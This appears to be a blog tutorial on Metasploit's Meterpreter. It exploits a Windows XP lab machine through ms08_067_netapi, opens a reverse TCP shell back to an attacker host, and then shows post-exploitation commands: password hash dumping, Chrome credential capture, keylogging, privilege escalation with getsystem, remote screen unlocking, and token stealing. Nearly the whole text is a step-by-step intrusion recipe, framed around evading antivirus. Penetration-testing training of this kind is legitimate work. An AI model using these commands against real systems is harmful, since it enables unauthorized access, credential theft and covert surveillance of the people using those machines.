Metasploit 4
Meterpreter part 1
What is meterpreter ?
Meterpreter is payload that uses DLL injection technique in memory so ,
Antiviruses software can't detect it because meterpreter writes nothing to disk
Meterpreter uses encrypted communications.
Now let's try to hack windows machine (Windows XP) and set Meterpreter as a payload
First we will use ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi
Then we set the remote host (victim)
set RHOST 192.168.0.227
Then we set meterpreter as a payload
set PAYLOAD windows/meterpreter/reverse_tcp
we set the IP address of the local machine (attacker) so that meterpreter can connect back to the attacker machine
set LHOST 192.168.0.229
Then ...
exploit
Excellent
The exploit (ms08_067_netapi) succeed and the remote machine (victim) connecting back to the local machine (attacker)
Now we have a Meterpreter session open
Let's explore some basic Meterpreter commands:
1- sysinfo
collect information about the system
2- screenshot
capturing the current desktop
3- hashdump
Dumping the password hash
Note: Meterpreter containe many of scripts such as (vnc, winenum , chrome_enum, killav ...)
To run a scripr run script_name for exmple(run chrome_enum) to capture chrome credentials
To list all meterpreter scripts jsu type run and hit tab twice
4- keystrokes
keystroke is Keyboard Capturing software, keystroke records the keys struck on a keyboard.
A- migrate to explorer
First we use ps command to view all process on the remote machine to get the PID of explorer process (explorer PID = 1432)
Then we do migration
what is migrate ?
To migrate meterpreter session from one process to another to avoid loosing the session if the process is killed
migrate 1432
B- run keylog_recorder
Note : the output file is located in "/root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt"
Now on windows try to type on keyboard
ping 192.168.0.229 then CTRL+C
C- To interrupt keystroker hit CTRL+C
now let's view the dumped file
cat /root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt
As expected
5-Privilege Escalation
To get system as admin user (Full access full privilege)
A- Load priv extension
use priv
B- To get system as admin
getsystem
![]()
C- To verify the admin privilege
getuid
6- VNC
VNC(Virtual Network Computing) is a remote control desktop software
To install VNC on the remote machine
run vnc
To unlock the remote screen
run screen_unlock
7- Token impersonation
How to impersonate user tokens to allow you to access to system or network without having to provide credentials.
There are two types of tokens
1- delegate : For interactive logons suck as (remote desktop and machine logging)
2- impersonate : For non-interactive logons such as domain logon
To do so you have to load incognito extension
use incognito
Then to list the tokens available
list_tokens -u
To get the tokens of SYSTEM
impersonate_token "NT AUTHORITY\\SYSTEM"
Now we currently running as SYSTEM (Full access)
OR
use ps command to list all running processes , Then you can steal the token of the owner of any process
A- ps
Now if i want to run as Administrator (owner of the process wuauctl.exe) PID = 1528 OR for sure any other process that owned by Administrator
B-steal_token 1528
